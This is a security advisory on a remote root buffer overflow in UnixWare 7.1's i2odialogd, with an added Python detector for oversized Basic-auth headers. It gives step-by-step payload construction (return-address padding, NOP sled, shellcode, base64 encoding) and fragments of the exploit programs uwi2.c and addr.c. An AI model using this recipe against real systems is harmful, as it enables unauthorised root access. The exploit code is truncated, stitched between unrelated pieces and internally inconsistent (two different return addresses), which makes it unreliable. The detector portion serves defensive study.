It is possible to gain remote root access to a UnixWare 7.1 system by exploiting a vulnerability in the i2odialogd daemon. This daemon is installed and runs by default.
Credit:
The information was provided by: Brock Tellier.
The i2odialog daemon is an HTTP front-end used to control the i2o subsystem. A user who controls this subsystem can do all sorts of nasty things, so authentication is performed against the local root password. The authentication is standard HTTP Basic authentication:
GET / HTTP/1.0
Authorization: Basic username:password\r\n\r\n
Unfortunately, there is a classic buffer overflow in the username:password field: when fed a string of 88 or more characters, the daemon crashes. The only complication to this exploit is that, according to the relevant RFCs, the username:password pair must be base64 (MIME) encoded, so we are forced to MIME encode the entire exploit string. In addition, the buffer we have to work with is very small, so we change the order NOP+SHELLCODE+ADDR to ADDR+NOP+SHELLCODE in order to give ourselves a wider range of usable addresses.
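The same Authorization header is where a defender can spot this attack before it reaches the daemon. The Python below is an added example, not part of the advisory or of Brock Tellier's code: it decodes the Basic token of a raw request and flags credentials that exceed the 88-byte threshold the advisory cites, contain non-printable bytes, or fail base64 decoding. The request layout and threshold come from this page; the function names and sample requests are constructed here.

```python
import base64
import binascii
import re

# The advisory reports i2odialogd crashing once the decoded
# username:password string reaches 88+ characters, so anything
# longer is treated as an overflow attempt rather than a login.
MAX_CREDENTIAL_LEN = 88

AUTH_RE = re.compile(rb"^Authorization:\s*Basic\s+(\S+)\s*$", re.IGNORECASE)


def make_request(credential: bytes) -> bytes:
    """Constructed HTTP/1.0 request with a Basic header (helper for samples)."""
    token = base64.b64encode(credential)  # base64, no trailing newline
    return b"GET / HTTP/1.0\r\nAuthorization: Basic " + token + b"\r\n\r\n"


def inspect_basic_auth(raw_request: bytes) -> dict:
    """Classify the Basic Authorization header of one raw HTTP request.

    verdict: 'no-basic-auth', 'bad-base64', 'oversized', 'binary' or 'ok'.
    decoded_len: length of the decoded username:password string.
    """
    head = raw_request.split(b"\r\n\r\n", 1)[0]  # headers only, body ignored
    token = None
    for line in head.split(b"\r\n"):
        m = AUTH_RE.match(line)
        if m:
            token = m.group(1)
            break
    if token is None:
        return {"verdict": "no-basic-auth", "decoded_len": 0}
    try:
        # validate=True rejects non-alphabet characters and bad padding
        decoded = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return {"verdict": "bad-base64", "decoded_len": 0}
    if len(decoded) > MAX_CREDENTIAL_LEN:
        verdict = "oversized"          # longer than the daemon's buffer
    elif any(b < 0x20 or b > 0x7E for b in decoded):
        verdict = "binary"             # addresses/NOPs/shellcode, not text
    else:
        verdict = "ok"
    return {"verdict": verdict, "decoded_len": len(decoded)}
```

Run `inspect_basic_auth` over each request line pair seen by a proxy or IDS in front of port 360; anything but 'ok' deserves a look.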
Exploit:
Some notes about the exploit:
No mimencode() function has been added to this exploit code, meaning that you have to hard-code your exploit string. If you want to change the return address from the default given below, you will have to MIME encode 92 bytes of addresses (or 88 bytes of garbage and your 4-byte address), then some NOPs, then the shellcode, then a colon, any character and a NULL (that is, ADDR+NOP+SHELLCODE+:+A+0). You must paste this MIME-encoded string into the program where it is marked (do not append a newline to the exploit string).
Under UnixWare, you can use mimencode(1) to convert stdout from your program into MIME-encoded text.
---uwi2.c---
/* uwi2.c
*
* i2o remote root exploit for UnixWare 7.1
* compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
* ./uwi2 <hostname>
* The hard-coded RET address is 0x8047d4c
*
* To either replace the shellcode or change the offset you must
* first craft a program which outputs, in this order:
* - 92 bytes of your RET address (EIP starts at 89)
* - NOPs, as many as you would like
* - your shellcode
* - the character ":"
* - any character, maybe "A", as I've done below
* - NULL
* When printf()'ing this string, do NOT append a \newline!
* You then pipe the output of this program to a MIME encoder (mimencode
* on UnixWare). You then take the output of this program and paste it
* where I've marked below.
*
* Brock Tellier btellier@usa.net
*
*/
char buf[BUFLEN];
char sockbuf[BUFLEN];
char c;
int offset=0;
int i, ascii,num;
int i2oport = 360;
int sock;
int addr = 0x80474b4;
struct sockaddr_in sock_a;
struct hostent *host;
/*
* addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2odialogd
* simply MIME encode the output of this program and put into the
* appropriate place in uwi2.c
*
* Usage: cc -o addr addr.c; ./addr <offset> <size>
*
* Brock Tellier btellier@usa.net
*/